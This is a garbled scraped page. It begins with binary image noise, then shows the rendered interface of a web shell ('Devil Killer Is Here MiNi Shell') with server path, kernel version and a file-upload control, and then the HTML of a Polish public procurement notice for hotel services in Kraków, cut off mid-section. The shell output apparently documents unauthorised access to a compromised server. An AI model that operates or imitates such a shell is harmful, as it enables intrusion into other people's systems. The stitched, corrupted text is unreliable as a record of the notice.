JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240307/0023457901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ŚWIADCZENIE HOTELARSKICH USŁUG NOCLEGOWYCH <br/>NA TERENIE KRAKOWA DLA NARODOWEGO CENTRUM NAUKI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Narodowe Centrum Nauki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 121361537</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Twardowskiego 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-312</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 12 3419001</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@ncn.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ncn.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wspieranie działalności naukowej w zakresie badań podstawowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ŚWIADCZENIE HOTELARSKICH USŁUG NOCLEGOWYCH <br/>NA TERENIE KRAKOWA DLA NARODOWEGO CENTRUM NAUKI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-585fb895-cf08-11ee-875e-a22221c84ba7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00234579</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00104504/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Hotelarska usługa noclegowa na terenie Krakowa dla Ekspertów i gości NCN</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.sidaspzp.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wykonawcy złożenie oferty w postępowaniu, a także<br/>komunikację z Zamawiającym. Dostęp do platformy jest dla Wykonawcy bezpłatny. Podgląd i pobieranie dokumentacji postępowania<br/>nie wymaga logowania. W celu komunikacji z Zamawiającym i złożenia oferty w postępowaniu należy założyć konto na stronie:<br/>https://app.sidaspzp.pl/rejestracja/wykonawcaSzczegółowe informacje o sposobie porozumiewania się Zamawiającego z<br/>Wykonawcami zwarte są w Rozdziale 11 SWZ. Wnioski o wyjaśnienie treści SWZ można przekazywać za pośrednictwem Platformy<br/>SIDAS lub na adres: zamowienia.publiczne@ncn.gov.pl Adres elektroniczny Platformy: https://zamowienia.sidaspzp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania sprzętowo-aplikacyjne<br/>umożliwiające pracę na Platformie SIDAS:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s, b) komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć ram min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych: Linux Kernel<br/>4.0, Windows 7 i MacOS 10.12 – lub ich nowsze wersje,c) zainstalowana przeglądarka internetowa w najnowszych wersjach, np.:<br/>Firefox, Chrome, Opera,d) włączona obsługa JavaScript,e) zainstalowany program do obsługi formatów .pdf np. Acrobat<br/>Reader,f) dopuszczalne formaty przesłanych danych tj. plików o wielkości do 100 MB to: png, jpg, jpeg,gif, doc, docx, xls, xlsx, ppt,<br/>pptx, odt, ods, odp, odf, pdf, zip, rar, 7zip, txt, ath, xml, dwg, xades, tar, 7z,eml, msg,g) czas serwera jest synchronizowany z czasem<br/>udostępnionym przez Główny Urząd Miar.2. Wykonawca składa ofertę w postępowaniu wyłącznie za pośrednictwem Platformy<br/>SIDAS, która zapewnia zachowanie integralności, autentyczności, nienaruszalności danych i ich poufności w ramach wymiany i<br/>przechowywania informacji, w tym zapewniających możliwość zapoznania się z ich treścią wyłącznie po upływie terminu na ich<br/>składanie;3. Wykonawca, który zamierza złożyć ofertę w postępowaniu o udzielenie zamówienia publicznego, musi założyć konto<br/>Wykonawcy na Platformie SIDAS. Rejestracji konta Wykonawcy można dokonać na<br/>stronie:https://app.sidaspzp.pl/rejestracja/wykonawca Instrukcja zakładania konta na Platformie SIDAS oraz składania oferty i zasad<br/>komunikacji znajduje się w „Instrukcji użytkownika systemu PZP 1.3 –Wykonawca” dostępnej pod adresem: https://sidaspzp.pl/wp content/uploads/2020/07 Madkom_PZP_wykonawca_1.3.pdf4. Oferta pod rygorem nieważności musi być sporządzona w formie<br/>elektronicznej (z kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym w ogólnie dostępnych formatach danych, w szczególności w formatach: .pdf, doc,<br/>.docx;oferta wraz z załącznikami musi być sporządzona w języku polskim. Każdy dokument składający się na ofertę lub złożony<br/>wraz z ofertą sporządzony w języku innym niż polski musi być złożony wraz z tłumaczeniem na język polski.5.Oferta musi być<br/>opatrzona podpisem kwalifikowanym lub podpisem zaufanym lub podpisem osobistym przez Wykonawcę, tj. osobę (osoby)<br/>działającą w imieniu Wykonawcy, zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze albo osobę (osoby)<br/>upoważnioną do reprezentowania Wykonawcy na podstawie pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie<br/>do reprezentowania Wykonawcy.6. Tajemnica przedsiębiorstwa - w przypadku gdy dokumenty elektroniczne w postępowaniu<br/>przekazywane przez Wykonawcę przy użyciu środków komunikacji elektronicznej zawierają informacje stanowiące tajemnicę<br/>przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, Wykonawca w celu<br/>utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku (odpowiednia nazwa pliku).7.<br/>Podmiotowe środki dowodowe, oświadczenia, zobowiązanie podmiotu udostępniającego zasoby, dokumenty, pełnomocnictwo<br/>określone w Rozdziale 10 SWZ sporządza się w postaci elektronicznej w formatach danych określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17.02.2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, z uwzględnieniem rodzajów przekazywanych danych oraz przekazuje w postaci elektronicznej i<br/>opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.8. Informacje, oświadczenia lub<br/>dokumenty, inne niż określone w<br/>Rozdziale 10 SWZ (nie dotyczy oferty), przekazywane w postępowaniu, sporządza się w postaci elektronicznej w formatach danych<br/>określonych w przepisach o których mowa w pkt 7, lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu<br/>środków komunikacji elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DSO.271.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ŚWIADCZENIE HOTELARSKICH USŁUG NOCLEGOWYCH <br/>NA TERENIE KRAKOWA DLA NARODOWEGO CENTRUM NAUKI </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze najkorzystniejszą ofertę, spośród ofert<br/>złożonych w postępowaniu, które nie zostały odrzucone, na podstawie kryteriów oceny ofert określonych w Rozdziale 19 SWZ. Za<br/>najkorzystniejszą zostanie uznana oferta, która uzyska największą łączną liczbę punktów po zsumowaniu punktów uzyskanych w<br/>kryteriach K1-K2. 2. Wszystkie obliczenia punktów będą dokonywane z dokładnością do dwóch miejsc po przecinku. 3. Kryteria<br/>oceny ofert i ich znaczenie: kryterium K1 - Cena oferty brutto - waga 80%; kryterium K2 -Warunki anulowania rezerwacji - waga 20%;<br/>4.Zamawiający<br/>dokona oceny ofert, przyznając punkty w ramach kryterium, przyjmując zasadę, że 1% =1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki anulowania rezerwacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W celu wykazania spełnienia powyższego warunku Zamawiający wymaga od Wykonawcy wykazania, że dysponuje<br/>odpowiednim zasobem w postaci:<br/>− hotelu o standardzie minimum czterogwiazdkowym (****) (kategoryzacja obiektów hotelarskich uzyskana zgodnie z<br/>wymaganiami rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i<br/>innych obiektów, w których są świadczone usługi hotelarskie (t.j. Dz. U. z 2017 r., poz. 2166 z późn. zm.) określonymi w<br/>Załączniku nr 1 do rozporządzenia; zlokalizowanym w Krakowie w obszarze zaznaczonym na<br/>mapie zamieszczonej odpowiednio w Załączniku 1 (w promieniu maksymalnie 4 km od siedziby Zamawiającego) oraz<br/>− który posiada co najmniej 150 pokoi jednoosobowych lub łącznie jednoosobowych i dwuosobowych do pojedynczego<br/>wykorzystania, o minimalnym metrażu 17 m2, wyposażone w łazienkę z pełnym węzłem sanitarnym (w łazience musi<br/>znajdować się podstawowe wyposażenie do dyspozycji gości, jak: ręczniki, mydło, żel pod prysznic), klimatyzację, telefon,<br/>czajnik elektryczny, TV, lodówkę, bezpłatny dostęp do Internetu, przystosowane do pracy biznesowej (wyposażone w biurko<br/>lub stół do pracy, odpowiednie oświetlenie miejsca pracy, możliwość podłączenia komputera osobistego bezpośrednio w<br/>pokoju) oraz<br/>− przynajmniej jedno bezpośrednie połączenie środkami komunikacji publicznej z Dworcem Głównym PKP i przynajmniej<br/>jedno bezpośrednie połączenie środkami komunikacji publicznej z siedzibą Narodowego Centrum Nauki (nazwa przystanku:<br/>Rondo Grunwaldzkie) oraz przy założeniu, że przystanek MPK musi być zlokalizowany w odległości drogowej nie większej<br/>niż 300 m od hotelu.<br/>− zapewnienia możliwości korzystania z parkingu dla gości w odległości drogowej nie większej niż 200 m od obiektu, w<br/>którym będą świadczone usługi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga w niniejszym postępowaniu złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Składane wraz z ofertą: 1. zobowiązanie podmiotu udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, w sytuacji, gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby. (UWAGA: dotyczy sytuacji, w której<br/>Wykonawca powołuje się na zasoby podmiotu udostępniającego zasoby w celu wykazania spełnienia warunków udziału w<br/>postępowaniu) 2. oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego będzie wynikało, które<br/>części zamówienia wykonają poszczególni Wykonawcy w przypadku wykazania spełnienia warunków udziału w postępowaniu<br/>dotyczących doświadczenia. (UWAGA: dotyczy sytuacji gdy Wykonawcy wspólnie ubiegają się o udzielenie<br/>zamówienia).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OFERTA POWINNA ZAWIERAĆ:1) formularz oferty sporządzony według wzoru stanowiącego Załącznik nr 2 do SWZ; 2)<br/>opis hotelu w którym mają być świadczone usługi wraz z informacją o podstawie dysponowania tym zasobem, sporządzony<br/>według wzoru stanowiącego załącznik Nr 7 do SWZ, 3) oświadczenie o niepodleganiu wykluczeniu z postępowania oraz<br/>spełnianiu warunków udziału w postępowaniu – sporządzone według wzoru stanowiącego Załącznik nr 4 do SWZ (jeżeli<br/>dotyczy: także<br/>oświadczenia innych Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz oświadczenie podmiotów<br/>udostępniających zasoby – jeżeli Wykonawca powołuje się na te zasoby);4) (jeżeli dotyczy) oświadczenie Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Wzór oświadczenia zawarty jest w Załączniku nr 6 do SWZ, 5) (jeżeli<br/>dotyczy) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, 6) dokument potwierdzający umocowanie osoby<br/>podpisującej ofertę do działania w imieniu Wykonawcy – odpis lub informację z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do<br/>złożenia dokumentów, o których mowa w zdaniu pierwszym,<br/>jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał<br/>dane umożliwiające dostęp do tych dokumentów formularzu oferty; 7) (jeżeli dotyczy) pełnomocnictwo, w przypadku<br/>podpisania oferty przez pełnomocnika – dotyczy to również przypadków składania oferty przez Wykonawców występujących<br/>wspólnie, czyli np. uczestników konsorcjum, wspólników spółki cywilnej. Pełnomocnictwo musi zawierać w swojej treści<br/>zakres umocowania oraz jednoznacznie określać czynności do których<br/>pełnomocnik jest upoważniony. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć<br/>do oferty.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia nie muszą posiadać określonej formy prawnej w celu<br/>złożenia oferty.<br/>4. Zamawiający nie określa dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagań związanych z<br/>realizacją zamówienia w inny sposób niż w odniesieniu do pojedynczych Wykonawców.<br/>5. Zapisy w SWZ oraz załącznikach dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki udziału w postępowaniu<br/>określone w Rozdziale 6 ust. 1 pkt.4 lit. a) SWZ musi spełniać każdy z wykonawców.<br/>7. Brak podstaw do wykluczenia musi wykazać każdy z Wykonawców oddzielnie.<br/>8. W przypadku wspólnego wykazywania spełnienia warunków udziału w postępowaniu Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni<br/>Wykonawcy. Wzór oświadczenia stanowi Załącznik nr 6 do SWZ.<br/>9. Jeżeli w niniejszym postępowaniu zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych Wykonawców.<br/>10. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców kluczowych zadań<br/>dotyczących realizacji usługi.<br/>11. Po złożeniu oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem wyznaczonym do reprezentowania Wykonawców.<br/>12. Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielnie wraz z ofertą oświadczenie<br/>o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp, którego wzór stanowi Załącznik nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający 